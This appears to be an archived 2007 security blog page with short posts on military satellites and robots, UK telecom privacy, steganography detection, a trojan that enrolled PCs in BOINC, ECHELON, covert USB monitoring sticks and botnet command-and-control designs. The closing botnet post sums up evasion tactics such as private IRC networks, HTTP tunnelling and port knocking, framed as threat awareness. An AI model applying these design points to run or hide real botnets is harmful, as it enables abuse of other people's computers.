Is it just me, or inherited wealth is boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power and we ended up with several states of power - positional power, the C-level executives, expertise power, or the revenge of the underestimated walking case studies, and networking power. It's all a cyclical process like pretty much anything in life.

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning - it's targeted bandwidth capability where it's needed and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct.

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as payload capacity is what adds more value to these robots. An Israeli based defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weigh approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility for a 360 degree view, it's noise generation level, the variety of terrains its supports, and most importantly - would it put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

Thursday, March 08, 2007

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark it's logical to conclude the U.K gets poor ratings as web site privacy especially in the commercial sector is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, one they cannot legally obtain by themesleves, and so they ought to perform as paper-tigers to access it? Here's an interesting analysis :

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, they've released a report claiming Italy's COMINT is worse than their (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.

Steganography Applications Hash Set

Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such ongoing communication :

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post.

Distributed Computing with Malware

Distributed computing with malware infected PCs is nothing new as a concept, it's just the lack of botnet master's desire to contribute processing power for anything socially oriented. That's until late last month, when members of Berkeley's BOINC project noticed a project that was suspiciously becoming popular and found out that malware infected PCs had the BOINC client installed to participate in it :

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only would botnet masters take this note seriously, I'm sure we'll see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power?

Wednesday, March 07, 2007

Documentary on ECHELON - The Spy System

Remember ECHELON? The ├╝ber-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic using predefined keywords? Well, the system is still operating, and with the lack of transparency in the participating country's use and abuse of the technology, all we need is an EU alternative competing with the original.

Watch this excellent half an hour long documentary and find out : "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."

USB Surveillance Sticks

Despite the ongoing awareness built among enterprises and end users on the risks posed by removable media, there are vendors offering various surveillance solutions over an USB stick. Some are handy, others contradictive. And while RFID tags are getting smaller than a crop of rice, here are three surveillance solutions to keep in mind right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95 which comes with lots of features as well as automatic updates :

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can
then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when applied at Google Earth :

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution supposed to assist you in case your iPod or even PSP get stolen, all you have to do is infect your device and prey there's Internet connectivity at a later stage. Tracking your stolen devices is one thing, getting them back is completely another :

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into."

Death is Just an Upgrade

Started as a project to digitally mimic 100% a human's behaviour, the Virtual Soldier research program is getting more funding to accomplish its mission, and go beyond :

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown up on pieces, getting hit by a truck, or pretty much anything that you would never get the chance to -- legally -- expose a living human to, for testing purposes.

Botnet Communication Platforms

Botnets, or the automated exploitation and management of malware infected PCs is perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you define it as the war on bandwidth or who's commanding the largest infected population, this simple distributed hosts management problem is continuing to evolve in order for the botnet masters to remain undetected for as long as possible. On the other hand, the growing Internet population combined with the lack of awareness of the "just got a PC for Christmas" users, and IPv4's well known susceptability to IP spoofing compared to IPv6, always make the concept an interesting one to follow.

Despite that at the beginning of 2006, I pointed out on how malware related documentation and howtos turned into open source code resulting in a flood of malware variants, thus lowering the entry barries for a novice malware copycats, a week ago I located a very throughout document on various botnet communication platforms and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground breaking in this one besides the various advices on stripping the IRCd, creating own network of IRC servers compared to using public ones, and on the importance of distributed secrecy of the botnet participants' IPs, namely each bot would never know the exact number or location of all servers and bots.

HTTP Botnet Communications

The possiblities with PHP and MySQL in respect to flexibility of the statistics, layered encryption and tunneling, and most importantly, decentralizing the command even improving authentication with port knocking are countless. Besides, with all the buzz of botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating in between HTTP's noise improves their chance of remaining undetected. Rather ironic, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps among the main reasons to repost these graphs was the ICQ communication platform which I'll leave up to you to figure out. As a major weakness is listed the reliance on icq.com, but as we've already seen cases of botnets obtaining their commands by visiting an IRC channel and processing its topic, in this case it's ICQ WhiteLists getting the attention.

Related comments on the programming "know-how" discussed will follow. Know your Enemy!